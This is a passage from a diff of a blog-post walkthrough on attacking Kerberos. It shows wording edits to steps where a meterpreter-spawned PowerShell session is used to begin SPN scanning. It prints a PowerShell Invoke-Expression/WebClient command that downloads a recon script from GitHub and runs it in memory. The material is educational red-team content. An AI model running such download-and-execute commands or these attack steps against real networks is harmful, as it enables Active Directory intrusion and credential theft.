leonjza/leonjza.github.io/content/post/2016-01-09-kerberos-kerberoast-and-golden-tickets.markdown

 {{< figure src="/images/kerberos_golden_ticket_exec_powershell.png" >}}

-With the module configured to use the meterpreter session we originally got, as well as our exploit handler waiting in the background for the powershell connection, we can `run` this module and hope it works!
+With the module configured to use the meterpreter session we originally got, as well as our exploit handler waiting in the background for the powershell connection, we issue the `run` command and hope it works!

 {{< figure src="/images/kerberos_golden_ticket_powershell_shell.png" >}}

 > Powershell session session 3 opened

-Ok, that was a lot of work, but now we have the environment we need to get in with the SPN scanning!
+Ok, that was a lot of work, but now we have the environment we need to get on with the SPN scanning!
 Simply interact with the session that spawned.

 The next thing we want to do is get the `Find-PSServiceAccounts` PowerShell function into the environment.
 The script lives [here](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts).
-Thankfully, we can kind of _include_ functions into the current session by using the powershell `Invoke-Expression` cmdlet.
+Thankfully, we can kind of _include_ functions into the current session by using the powershell `Invoke-Expression` cmdlet for a new `Net.WebClient` object.
 To do that we run:

 ```
 Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Find-PSServiceAccounts')